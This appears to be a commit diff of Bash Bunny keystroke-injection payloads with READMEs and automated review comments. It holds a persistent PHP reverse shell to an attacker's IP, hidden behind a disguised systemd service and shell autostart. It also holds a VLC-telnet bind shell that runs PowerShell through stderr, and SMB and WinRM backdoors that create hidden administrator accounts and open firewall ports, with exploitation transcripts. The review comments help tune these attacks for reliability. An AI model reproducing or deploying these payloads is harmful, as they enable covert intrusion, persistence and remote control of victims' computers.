[[ "${available_binaries[*]}" =~ "/bin/python" ]] && available_payloads+=("${PYTHON_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/ruby" ]] && available_payloads+=("${RUBY_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/sh" ]] && available_payloads+=("${SH_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/mknod" && "${available_binaries[*]}" =~ "/bin/telnet" ]] && available_payloads+=("${TELNET_PAYLOAD}") || echo ""
random_payload=${available_payloads[$RANDOM % "${#available_payloads[@]}"]}
$BASH -c "${random_payload}" &
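Review bot: The `|| echo ""` tails on the `[[ ... ]] && available_payloads+=(...)` lines are redundant under `set -e`: a failing left-hand side of an `&&` list does not trigger errexit, so their only effect is a blank line printed for every payload that is not available. `available_payloads` can also be empty when none of the listed binaries exist, in which case `$RANDOM % "${#available_payloads[@]}"` is a modulo by zero that errexit turns into an unhelpful abort; a guard such as `(( ${#available_payloads[@]} )) || exit 1` before the selection makes that case explicit. The bare `# [CTRL + c]` comments above the mkfifo and telnet variants do not say what the reader is expected to do with them — presumably how that session is ended — so spell it out.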


@@ -0,0 +1,36 @@
## About:
* Title: persistentReverseBunny
* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, STORAGE
## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs.
### Workflow:
Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell.
### Algorithm:
1. Stop storing history, this helps to keep tracks clear from begining.
2. Creating reverse shell.
3. Creating non-root systemd service.
4. Enabling service.
5. Starting service on trigger of firing terminal emulator/shell.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| ----------------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| persistentReverseBunny/ | /payloads/libray/ |
### Note:
* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`.
#### Support me if you like my work:
* https://twitter.com/drapl0n


@@ -0,0 +1,51 @@
# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh \&
Q ENTER
Q STRING disown
Q ENTER
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH


@@ -0,0 +1,18 @@
#!/bin/bash
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system/
echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop
cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/
chmod +x /var/tmp/.system/shc
/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
rm /var/tmp/.system/pop*
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc
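Review bot: `systemctl --user start --now systemBUS.service` passes `--now`, which as far as I know is an option of `enable`/`disable`/`mask` rather than `start`, and the preceding `systemctl --user enable --now` has already started the unit, so the line is redundant and likely fails with an unrecognized-option error; drop it. The script also has no header comment, unlike the payload.txt files in this commit; a `# Title / Description / Author` block matching them would keep the library consistent.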


@@ -0,0 +1,50 @@
# "VideoLan VLC Media Player" Bind Shell
- Title: "VideoLan VLC Media Player" Bind Shell
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Concept
In the list of commands allowed by "VideoLan VLC Media Player" on the "Telnet" interface, the use of the command "add" with a wrong argument redirects to the "stderr" of the process the exact content of this argument. The PowerShell script listens to the "stderr" output of the "VideoLan VLC Media Player" process and retrieves the payload to execute it.
## Description
1) Hide "PowerShell" window.
2) Determines the path of the "VLC Media Player" executable.
3) Creates two rules on the native firewall of "Microsoft Windows" to :
- Allow the executable to open a TCP port.
- Allow all incoming connections on that TCP port.
4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
5) Redirects the standard error output of this process and retrieves the payload for execution.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly TELNET_PORT="44423"
readonly TELNET_PASSWORD="VLC_T3LN3T"
```
## Exploitation
```
hacker@hacker-computer:~$ nmap -Pn -sT -p 44423 <TARGET-IP>
[...]
hacker@hacker-computer:~$ telnet <TARGET-IP> 44423
Trying <TARGET-IP>...
Connected to <TARGET-IP>.
Escape character is '^]'.
VLC media player 3.0.18 Vetinari
Password: <TELNET_PASSWORD>
Welcome, Master
> add "EXEC/(ls C:\Users\) > .\..\..\loot\ls.log"
> add "EXEC/(ipconfig) > .\..\..\loot\ipconfig.log"
> shutdown
```


@@ -0,0 +1,86 @@
<#
# Author: TW-D
# Version: 1.0
#>
Param (
[String] $TELNET_PORT,
[String] $TELNET_PASSWORD
)
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
# Determines the path of the "VLC Media Player" executable.
#
$VIDEOLAN_64 = "$(Join-Path -Path "${ENV:ProgramFiles}" -ChildPath "VideoLAN\VLC\vlc.exe")"
$VIDEOLAN_32 = "$(Join-Path -Path "${ENV:ProgramFiles(x86)}" -ChildPath "VideoLAN\VLC\vlc.exe")"
$VIDEOLAN_UNKNOW = "$(Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\" -Name "InstallLocation" -ErrorAction SilentlyContinue)\vlc.exe"
$VIDEOLAN_PATH = ""
Switch ($True) {
(Test-Path -Path "${VIDEOLAN_64}") {$VIDEOLAN_PATH = "${VIDEOLAN_64}"}
(Test-Path -Path "${VIDEOLAN_32}") {$VIDEOLAN_PATH = "${VIDEOLAN_32}"}
(Test-Path -Path "${VIDEOLAN_UNKNOW}") {$VIDEOLAN_PATH = "${VIDEOLAN_UNKNOW}"}
}
If ($TELNET_PORT -And $TELNET_PASSWORD -And $VIDEOLAN_PATH) {
# Creates two rules on the native firewall of "Microsoft Windows" to :
# - Allow the executable to open a TCP port.
# - Allow all incoming connections on that TCP port.
#
(NETSH ADVFIREWALL FIREWALL ADD RULE NAME="VideoLAN VLC Media Player Stream Port" PROTOCOL=TCP LOCALPORT=$TELNET_PORT DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN) | Out-Null
(NETSH ADVFIREWALL FIREWALL ADD RULE NAME="VideoLAN VLC Media Player Stream Service" ENABLE=YES PROGRAM="${VIDEOLAN_PATH}" DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN) | Out-Null
Do {
# Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
#
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.FileName = "${VIDEOLAN_PATH}"
$ProcessInfo.Arguments = "--qt-notification 0 --qt-start-minimized --intf telnet --telnet-host 0.0.0.0 --telnet-port ${TELNET_PORT} --telnet-password ${TELNET_PASSWORD}"
$ProcessInfo.CreateNoWindow = $True
$ProcessInfo.UseShellExecute = $False
$ProcessInfo.RedirectStandardOutput = $False
$ProcessInfo.RedirectStandardError = $True
$Process = New-Object System.Diagnostics.Process
$Process.StartInfo = $ProcessInfo
# Redirects the standard error output of this process and retrieves the payload for execution.
#
Register-ObjectEvent -InputObject $Process -EventName "ErrorDataReceived" -SourceIdentifier "Process.Stderr" -Action {
$Data = $EventArgs.Data
("${Data}" -Match '\%22(?<Action>.+)%2F(?<Argument>.+)\%22')
$Action = $Matches.Action
$Argument = [URI]::UnescapeDataString($Matches.Argument)
If ($Action -And $Argument) {
Try {
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoLogo -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command ${Argument}" -NoNewWindow
} Catch {}
}
Clear-Variable -Name "Matches"
} | Out-Null
Register-ObjectEvent -InputObject $Process -EventName "Exited" -SourceIdentifier "Process.Exited" -Action {
Write-Host "Process.Exited !"
} | Out-Null
Try {
$Process.Start() | Out-Null
$Process.BeginErrorReadLine()
$Process.WaitForExit()
} Finally {
Unregister-Event -SourceIdentifier "Process.Stderr"
Unregister-Event -SourceIdentifier "Process.Exited"
}
} While ($True)
}
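Review bot: In the `ErrorDataReceived` action the `-Match` expression on the line after `$Data = $EventArgs.Data` is evaluated as a bare statement, so its `$True`/`$False` result is emitted as job output instead of guarding the extraction, and `$Matches` keeps its previous value when the regex does not match — the trailing `Clear-Variable` only partly compensates. Write it as `If ("${Data}" -Match '...') { ... }` with the `$Action`/`$Argument` extraction and the `Start-Process` call inside. The empty `Catch {}` hides every failure of the launched process; at least log `$_` there. The header should also state that the telnet interface is bound on `0.0.0.0` with a static password and that both firewall rules apply to the PUBLIC, PRIVATE and DOMAIN profiles, since that is the exposure this script creates on the host.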


@@ -0,0 +1,89 @@
#!/bin/bash
#
# Title: "VideoLan VLC Media Player" Bind Shell
#
# Description:
# 1) Hide "PowerShell" window.
# 2) Determines the path of the "VLC Media Player" executable.
# 3) Creates two rules on the native firewall of "Microsoft Windows" to :
# - Allow the executable to open a TCP port.
# - Allow all incoming connections on that TCP port.
# 4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
# 5) Redirects the standard error output of this process and retrieves the payload for execution.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmodes: HID STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 and VideoLan VLC Media Player 3.0.18
#
# NOTE
# ===============
# The target user must belong to the 'Administrator' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## INITIALIZATION ########
readonly TELNET_PORT="44423"
readonly TELNET_PASSWORD="VLC_T3LN3T"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET BB_LABEL
GET SWITCH_POSITION
######## ATTACK ########
LED ATTACK
Q GUI r
Q DELAY 3000
Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 3000
Q LEFTARROW
Q DELAY 3000
Q ENTER
Q DELAY 3000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 2000
Q STRING "CD \"\${BB_VOLUME}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -TELNET_PORT \"${TELNET_PORT}\" -TELNET_PASSWORD \"${TELNET_PASSWORD}\""
Q ENTER
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH
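Review bot: Nothing verifies that the Bash Bunny storage volume was actually located before the payload is launched: if the `Win32_Volume` lookup that builds `$BB_VOLUME` matches nothing, `.Name` is empty, the path degenerates to a relative `payloads\<switch>\`, the `CD` fails and `.\payload.ps1` never runs — yet the script still signals FINISH and leaves an elevated, un-hidden PowerShell window open on the target. A guard typed before the `CD`, e.g. `Q STRING "If (-Not (Test-Path \"\${BB_VOLUME}payload.ps1\")) { Exit }"` followed by `Q ENTER`, would at least close that window on failure. Separately, the default `TELNET_PASSWORD="VLC_T3LN3T"` is one shared secret baked into every copy of this payload, typed in cleartext into an interactive console (PSReadLine normally persists such commands to ConsoleHost_history.txt even with `-NoProfile`), and it guards a telnet interface that the description says is opened on every firewall profile; the INITIALIZATION block should carry a comment such as `# Change both values per engagement: the password is typed in cleartext on the target and the port is opened on all firewall profiles.`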


@@ -0,0 +1,73 @@
# "Microsoft Windows" SMB Backdoor
- Title: "Microsoft Windows" SMB Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Description
1) Adds a user account.
2) Adds this local user to local administrator group.
3) If the target computer is equipped with a compatible Wi-Fi card :
Avoids security measures on the internal network with the
creation of a wireless "Hosted Network".
4) Shares "C:\" directory.
5) Adds a rule to the firewall.
6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
7) Hides user account.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly SMB_USERNAME="BB_User"
readonly SMB_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly SMB_SHARE="BB_SHARE"
```
## Exploitation
>
> The name of the access point and the security key will be those defined by the values of the constants : **SMB_SHARE** and **SMB_PASSWORD**.
>
```
hacker@hacker-computer:~$ nmcli dev wifi connect "<SMB_SHARE>" password "<SMB_PASSWORD>"
```
>
> The connection identifiers will be those defined by the values of the constants : **SMB_USERNAME** and **SMB_PASSWORD**.
>
```
hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./<SMB_USERNAME>:<SMB_PASSWORD>@<TARGET>
C:\WINDOWS\system32> whoami
nt authority\system
```
>
> The share name and identifiers will be those defined by the values of the constants : **SMB_SHARE**, **SMB_USERNAME** and **SMB_PASSWORD**.
>
```
smb://<TARGET>/<SMB_SHARE>/
```


@@ -0,0 +1,139 @@
#!/bin/bash
#
# Title: "Microsoft Windows" SMB Backdoor
#
# Description:
# 1) Adds a user account.
# 2) Adds this local user to local administrator group.
# 3) If the target computer is equipped with a compatible Wi-Fi card :
# Avoids security measures on the internal network with the
# creation of a wireless "Hosted Network".
# 4) Shares "C:\" directory.
# 5) Adds a rule to the firewall.
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
# 7) Hides user account.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmode: HID
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrators' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly SMB_USERNAME="BB_User"
readonly SMB_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly SMB_SHARE="BB_SHARE"
######## SETUP ########
LED SETUP
ATTACKMODE HID
######## ATTACK ########
LED ATTACK
Q DELAY 2000
Q GUI r
Q DELAY 7000
Q STRING "cmd"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 7000
Q LEFTARROW
Q DELAY 5000
Q ENTER
Q DELAY 7000
LED STAGE2
Q STRING "NET USER ${SMB_USERNAME} ${SMB_PASSWORD} /ADD"
Q ENTER
Q DELAY 1500
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${SMB_USERNAME} /ADD"
Q ENTER
Q DELAY 1500
if [ "${WIRELESS_HOTSPOT}" == "true" ]
then
LED SPECIAL
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${SMB_SHARE} KEY=${SMB_PASSWORD}"
Q ENTER
Q DELAY 5000
Q STRING "NETSH WLAN START HOSTEDNETWORK"
Q ENTER
Q DELAY 5000
fi
LED STAGE3
Q STRING "NET SHARE ${SMB_SHARE}=C:\\ /GRANT:${SMB_USERNAME},FULL /REMARK:\"BRemote BShare\""
Q ENTER
Q DELAY 1500
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Server Message Block for BB\" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
Q ENTER
Q DELAY 1500
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${SMB_USERNAME} /t REG_DWORD /d 0"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
Q STRING "EXIT"
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0
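Review bot: The hosted network reuses the new local-administrator password as the WPA2 pre-shared key (`NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${SMB_SHARE} KEY=${SMB_PASSWORD}`), so anyone in radio range who captures a 4-way handshake obtains an offline-crackable copy of the admin credential; a separate `readonly HOTSPOT_KEY="..."` constant in the INITIALIZATION block, used instead of `${SMB_PASSWORD}` on that line, keeps the radio and account trust boundaries apart. The account creation is also fragile: if an operator sets `SMB_PASSWORD` to more than 14 characters, `NET USER ... /ADD` stops on a "longer than 14 characters, continue? (Y/N)" prompt and the next typed command is consumed as its answer — net.exe accepts `/Y` to suppress that, i.e. `Q STRING "NET USER ${SMB_USERNAME} ${SMB_PASSWORD} /ADD /Y"`. Finally, the header's "Hides user account" only removes the account from the logon screen via `SpecialAccounts\UserList`; it still appears in `net user` and `Get-LocalUser`, and the description should say so rather than overstate the payload's stealth.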


@@ -0,0 +1,64 @@
# "Microsoft Windows" WinRM Backdoor
- Title: "Microsoft Windows" WinRM Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Description
1) Adds a user account.
2) Adds this local user to local administrator group.
3) If the target computer is equipped with a compatible Wi-Fi card :
Avoids security measures on the internal network with the
creation of a wireless "Hosted Network".
4) Enables "Windows Remote Management" with default settings.
5) Adds a rule to the firewall.
6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
7) Hides user account.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly WINDOWS_USERNAME="BB_User"
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly HOTSPOT_NAME="BB_HOTSPOT"
```
## Exploitation
>
> The name of the access point and the security key will be those defined by the values of the constants : **HOTSPOT_NAME** and **WINDOWS_PASSWORD**.
>
```
hacker@hacker-computer:~$ nmcli dev wifi connect "<HOTSPOT_NAME>" password "<WINDOWS_PASSWORD>"
```
>
> The connection identifiers will be those defined by the values of the constants : **WINDOWS_USERNAME** and **WINDOWS_PASSWORD**.
>
```
hacker@hacker-computer:~$ evil-winrm --ip <TARGET> --user <WINDOWS_USERNAME> --password '<WINDOWS_PASSWORD>'
*Evil-WinRM* PS C:\Users\<WINDOWS_USERNAME>\Documents> whoami
desktop-xxxxxxx\<WINDOWS_USERNAME>
```


@@ -0,0 +1,142 @@
#!/bin/bash
#
# Title: "Microsoft Windows" WinRM Backdoor
#
# Description:
# 1) Adds a user account.
# 2) Adds this local user to local administrator group.
# 3) If the target computer is equipped with a compatible Wi-Fi card :
# Avoids security measures on the internal network with the
# creation of a wireless "Hosted Network".
# 4) Enables "Windows Remote Management" with default settings.
# 5) Adds a rule to the firewall.
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
# 7) Hides user account.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmode: HID
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrators' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly WINDOWS_USERNAME="BB_User"
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly HOTSPOT_NAME="BB_HOTSPOT"
######## SETUP ########
LED SETUP
ATTACKMODE HID
######## ATTACK ########
LED ATTACK
Q DELAY 2000
Q GUI r
Q DELAY 7000
Q STRING "cmd"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 7000
Q LEFTARROW
Q DELAY 5000
Q ENTER
Q DELAY 7000
LED STAGE2
Q STRING "NET USER ${WINDOWS_USERNAME} ${WINDOWS_PASSWORD} /ADD"
Q ENTER
Q DELAY 1500
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${WINDOWS_USERNAME} /ADD"
Q ENTER
Q DELAY 1500
if [ "${WIRELESS_HOTSPOT}" == "true" ]
then
LED SPECIAL
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${HOTSPOT_NAME} KEY=${WINDOWS_PASSWORD}"
Q ENTER
Q DELAY 5000
Q STRING "NETSH WLAN START HOSTEDNETWORK"
Q ENTER
Q DELAY 5000
fi
LED STAGE3
Q STRING "WINRM QUICKCONFIG"
Q ENTER
Q DELAY 3000
Q STRING "y"
Q ENTER
Q DELAY 1500
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Windows Remote Management for BB\" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
Q ENTER
Q DELAY 1500
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${WINDOWS_USERNAME} /t REG_DWORD /d 0"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
Q STRING "EXIT"
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0
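Review bot: `WINRM QUICKCONFIG` followed by a typed `y` after a fixed 3000 ms is the fragile step: quickconfig can prompt more than once (service/listener, then the firewall exception) or not at all when WinRM is already configured, so the typed `y` and the `NETSH ADVFIREWALL` command after it can land on the wrong prompt; `Q STRING "WINRM QUICKCONFIG -q"` runs without prompting and lets the `Q STRING "y"` / `Q ENTER` / `Q DELAY 1500` lines be dropped. Quickconfig is also known to abort with a WinRM firewall-exception error when any network connection is on the Public profile; since this payload already adds its own rule for TCP 5985 on all profiles, a comment noting that expected failure — or a fallback such as `powershell -Command "Enable-PSRemoting -SkipNetworkProfileCheck -Force"` — would save operators a silent no-op. As in the sibling SMB payload, `NETSH WLAN SET HOSTEDNETWORK ... KEY=${WINDOWS_PASSWORD}` reuses the admin credential as the WPA2 key, exposing it to offline cracking from a captured handshake; a dedicated `readonly HOTSPOT_KEY="..."` constant fixes that. This file section runs to the end of the visible chunk; `shutdown -h 0` is taken as its last line.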